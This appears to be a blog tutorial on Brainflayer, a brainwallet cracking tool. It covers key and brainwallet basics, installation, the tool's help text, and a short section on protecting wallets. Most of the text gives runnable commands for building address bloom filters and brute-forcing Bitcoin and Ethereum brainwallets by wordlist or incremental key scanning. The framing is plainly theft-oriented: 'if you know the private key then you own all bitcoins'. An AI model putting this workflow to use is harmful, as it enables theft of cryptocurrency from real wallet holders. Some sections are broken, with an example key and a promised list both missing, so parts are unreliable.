Brainflayer is a Proof-of-Concept brainwallet cracking tool that uses libsecp256k1 for pubkey generation. It was originally released as part of a DEFCON talk about cracking brainwallets. The released video is available at the end of the article.
Many researchers have spotted that cryptocurrency users are using guessable private keys to store their bitcoin and ethereum. Brainflayer can monitor thousands of private keys in seconds. If you know the private key then you own all bitcoins and ethereums in it.
Blockchain hackers are using such methods and they have stolen more than 50$ million in ethereum.
What is a private key?
A private key in the context of Bitcoin or Ethereum is a secret number that allows the crypto-coins to be spent. Every crypto-wallet contains one or more private keys, which are saved in the wallet file. Crypto-addresses are derived mathematically from the private keys.
Because the private key is the “ticket” that allows someone to spend bitcoins, it is important that these are kept secret and safe. Private keys can be kept on computer files, but are also often written on paper.
A bitcoin private key is a 256-bit number. An example in hexadecimal is the following :
From the above private key, the following public addresses are derived mathematically:
16ga2uqnF1NqpAuQeeg7sTCAdtDUwDyJav #The address seems to have been used lately at 2019-03-13 16qVRutZ7rZuPx7NMtapvZorWYjyaME2Ue
If you are more interested in the maths behind bitcoin, then check hackernoon’s article about elliptic curve cryptography.
Private keys themselves are almost never handled by the user, instead, the user will typically be given a seed phrase that encodes the same information as private keys.
What is a Brainwallet?
A brain wallet is a standard wallet that the private key and relative public addresses are created by a hashed passphrase. The SHA-256 algorithm is regularly used by brainwallets as it produced 256-bit string which is the exact size as bitcoin’s private key.
In the above brainwallet generator, the word “password” is used as the secret passphrase. It is already mentioned that bitcoin address:
16ga2uqnF1NqpAuQeeg7sTCAdtDUwDyJav is used lately and it has in total received 0.356 BTC.
It is obvious that you must not use brainwallets with seed phrases that are generated by a human.
Bruteforce can crack even the most difficult human-generated passphrases.
List of most known brainwallets :
How to Install Brainflayer
The following commands can be used to install brainflayer and the required dependencies on Kali or Ubuntu.
#apt-get install git #git clone https://github.com/ryancdotorg/brainflayer.git #apt-get install openssl #apt-get install libgmp3-dev #apt-get install libimobiledevice-dev libplist-dev libusbmuxd-dev libssl-dev zlib1g-dev #apt-get install dh-autoreconf #cd brainflayer/ #make
Compile Error Handling
A lot of people are troubled with compilations errors. The following changes on the
Makefile file will help to overcome the errors.
change : LIBS = -lssl -lrt -lcrypto -lz -lgmp to : LIBS = -lssl -lrt -lcrypto -lz -lgmp -lpthread and remove all "-static" like : $(COMPILE) -static $^ $(LIBS) -o $@ to $(COMPILE) $^ $(LIBS) -o $@
The Man of Brainflayer
When everything is compiled, run it the flag
-h for listing the available running options.
root@lab:/# brainflayer -h Usage: brainflayer [OPTION]... -a open output file in append mode -b FILE check for matches against bloom filter FILE -f FILE verify matches against sorted hash160s in FILE -i FILE read from FILE instead of stdin -o FILE write to FILE instead of stdout -c TYPES use TYPES for public key to hash160 computation multiple can be specified, for example the default is 'uc', which will check for both uncompressed and compressed addresses using Bitcoin s algorithm u - uncompressed address c - compressed address e - ethereum address x - most signifigant bits of x coordinate -t TYPE inputs are TYPE - supported types: sha256 (default) - classic brainwallet sha3 - sha3-256 priv - raw private keys (requires -x) warp - WarpWallet (supports -s or -p) bwio - brainwallet.io (supports -s or -p) bv2 - brainv2 (supports -s or -p) VERY SLOW rush - rushwallet (requires -r) FAST keccak - keccak256 (ethercamp/old ethaddress) camp2 - keccak256 * 2031 (new ethercamp) -x treat input as hex encoded -s SALT use SALT for salted input types (default: none) -p PASSPHRASE use PASSPHRASE for salted input types, inputs will be treated as salts -r FRAGMENT use FRAGMENT for cracking rushwallet passphrase -I HEXPRIVKEY incremental private key cracking mode, starting at HEXPRIVKEY (supports -n) FAST -k K skip the first K lines of input -n K/N use only the Kth of every N input lines -B batch size for affine transformations must be a power of 2 (default/max: 4096) -w WINDOW_SIZE window size for ecmult table (default: 16) uses about 3 * 2^w KiB memory on startup, but only about 2^w KiB once the table is built -m FILE load ecmult table from FILE the ecmtabgen tool can build such a table -v verbose - display cracking progress -h show this help
Create the Bloom Filter
According to Wikipedia,
bloom filter is a space-efficient probabilistic data structure that is used to test whether an element exists in a set. False-positive matches are possible, but false negatives are not. In our case, there is a very small chance brainflayer that will return a cracked wallet that it is not actually cracked.
The next step is the creation of the bloom filter. A file which lists one bitcoin address per line is required. Then, addresses should be converted to Hash160 addresses. Finally, execute the following command :
$hex2blf btcaddress.hex btcaddress.blf
For Ethereum bloom filter creation, no hash160 conversion is required.
Crack Bitcoin via Wordlist
After the bloom filter creation, everything is ready for brute-forcing. Grab your longest wordlist and attack! The following commands are the most common ones:
$brainflayer -v -b btc.blf -i wordlist.txt $brainflayer -t sha3 -v -b btc.blf -i wordlist.txt $brainflayer -t bwio -v -b btc.blf -i wordlist.txt
sha256 algorithm is the default option.
Crack Ethereum via Wordlist
Similarly, the most common cracking options for ethereum are the following:
$brainflayer -t sha3 -c e -v -b eth.blf -i wordlist.txt $brainflayer -t keccak -c e -v -b eth.blf -i wordlist.txt $brainflayer -t sha256 -c e -v -b eth.blf -i wordlist.txt
Brainflayer does not support multi-thread functionality. For parallel cracking, you should run multiple instances with different
$brainflayer -v -n 1/3 -b btc.blf -i password.txt $brainflayer -v -n 2/3 -b btc.blf -i password.txt $brainflayer -v -n 3/3 -b btc.blf -i password.txt
Private Key Scanner
Brainflayer supports cracking via incremental private keys with option
-I . This method is extremely fast. A single modern core can scan more than 700.000 private keys per second.
$brainflayer -c e -v -b eth.blf -I 0000000000000000000000000000000000000000000000000000000000000001
Brainflayer Def Con Video
If you are still not satisfied, check for more information on def con video.
Brainflayer and Windows 10
In short, brainflayer is a tool that is designed for Linux operative system. There is the option to run brainflayer on Windows with WSL-Kali Linux. If you are interested in how to install and setup WSL-Kali on Windows click here.
The installation process of brainflayer on WSL-Kali is similar to normal Kali.
How to protect your brainwallet
The easiest way to protect yourself is by not using brainwallets. In case you still want to use one, then you must use a big complex random non-human generated seed as the input. Moreover, you have to ensure that the brainwallet is trusted and uses the best hashing algorithms (SHA256, SHA512 etc) multiple times to hash your seed.
Last but not least, users must never create or use a non-random bitcoin private key.